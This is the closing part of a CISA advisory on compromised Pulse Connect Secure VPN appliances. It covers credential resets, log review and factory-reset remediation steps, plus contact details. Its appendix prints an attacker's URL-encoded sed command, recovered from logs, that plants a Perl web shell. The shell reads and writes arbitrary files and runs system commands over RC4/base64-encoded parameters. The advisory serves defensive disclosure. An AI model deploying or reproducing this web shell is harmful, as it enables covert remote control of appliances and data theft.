  • Change all passwords associated with accounts passing through the Pulse Secure environment (including user accounts, service accounts, administrative accounts and any accounts that could be modified by any account described above, all of these accounts should be assumed to be compromised). Note: Unless an exhaustive password reset occurs, factory resetting a Pulse Connect Secure appliance (see Step 3 below) will only remove malicious code from the device, and may not remove the threat actor from the environment. The threat actor may use the credentials harvested to regain access even after the appliance is fully patched.
  • Review logs for any unauthorized authentications originating from the Pulse Connect Secure appliance IP address or the DHCP lease range of the Pulse Connect Secure appliance’s VPN lease pool.
  • Look for unauthorized applications and scheduled tasks in their environment.
  • Ensure no new administrators were created or non-privileged users were added to privileged groups.
  • Remove any remote access programs not approved by the organization.
  • Carefully inspect scheduled tasks for scripts or executables that may allow a threat actor to connect to an environment.

In addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files, should consider the guidance in KB44764 – Customer FAQ: PCS Security Integrity Tool Enhancements, which includes:

After preservation, you can remediate your Pulse Connect Secure appliance by: 

  1. Disabling the external-facing interface.  
  2. Saving the system and user config.
  3. Performing a factory reset via the Serial Console. Note: For more information refer to KB22964 (How to reset a PCS device to the factory default setting via the serial console)
  4. Updating the appliance to the newest version.
  5. Re-importing the saved config.   
  6. Re-enabling the external interface. 

CISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the Ivanti Integrity Checker Tool again after remediation has been taken place.

Contact Information

CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at

  • 1-888-282-0870 (From outside the United States: +1-703-235-8832)
  • central@cisa.dhs.gov (UNCLASS)
  • us-cert@dhs.sgov.gov (SIPRNET)
  • us-cert@dhs.ic.gov (JWICS)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/.

Appendix: Large sed Command Found In Unauthenticated Logs

Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20$n=$_[0];my%20$rs;for%20(my%20$i=0;$i%3C$n;$i++){my%20$n1=int(rand(256));$rs.=chr($n1);}return%20$rs;}sub%20a{my%20$st=$_[0];my%20$k=r([redacted]);my%20$en%20=%20RC4(%20$k.$ph,%20$st);return%20encode_base64($k.$en);}sub%20b{my%20$s=%20decode_base64($_[0]);%20my%20$l=length($s);my%20$k=%20substr($s,0,[redacted]);my%20$en=substr($s,[redacted],$l-[redacted]);my%20$de%20=%20RC4(%20$k.$ph,%20$en%20);return%20$de;}sub%20c{my%20$fi=CGI::param(%27img%27);my%20$FN=b($fi);my%20$fd;print%20%22Content-type:%20application/x-downloadn%22;open(*FILE,%20%22%3C$FN%22%20);while(%3CFILE%3E){$fd=$fd.$_;}close(*FILE);print%20%22Content-Disposition:%20attachment;%20filename=tmpnn%22;print%20a($fd);}sub%20d{print%20%22Cache-Control:%20no-cachen%22;print%20%22Content-type:%20text/htmlnn%22;my%20$fi%20=%20CGI::param(%27cert%27);$fi=b($fi);my%20$pa=CGI::param(%27md5%27);$pa=b($pa);open%20(*outfile,%20%22%3E$pa%22);print%20outfile%20$fi;close%20(*outfile);}sub%20e{print%20%22Cache-Control:%20no-cachen%22;print%20%22Content-type:%20image/gifnn%22;my%20$na=CGI::param(%27name%27);$na=b($na);my%20$rt;if%20(!$na%20or%20$na%20eq%20%22cd%22)%20{$rt=%22Error%20404%22;}else%20{my%20$ot=%22/tmp/1%22;system(%22$na%20%3E/tmp/1%202%3E&1%22);open(*cmd_result,%22%3C$ot%22);while(%3Ccmd_result%3E){$rt=$rt.$_;}close(*cmd_result);unlink%20$ot}%20%20print%20a($rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20%22%22){e();}else{%20%20%20&main();}}if%20($ENV{%27REQUEST_METHOD%27}%20eq%20%22POST%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs/dana-na/[redacted] came from IP XX.XX.XX.XX

References

Revisions

  • Initial version: April 20, 2021

This product is provided subject to this Notification and this Privacy & Use policy.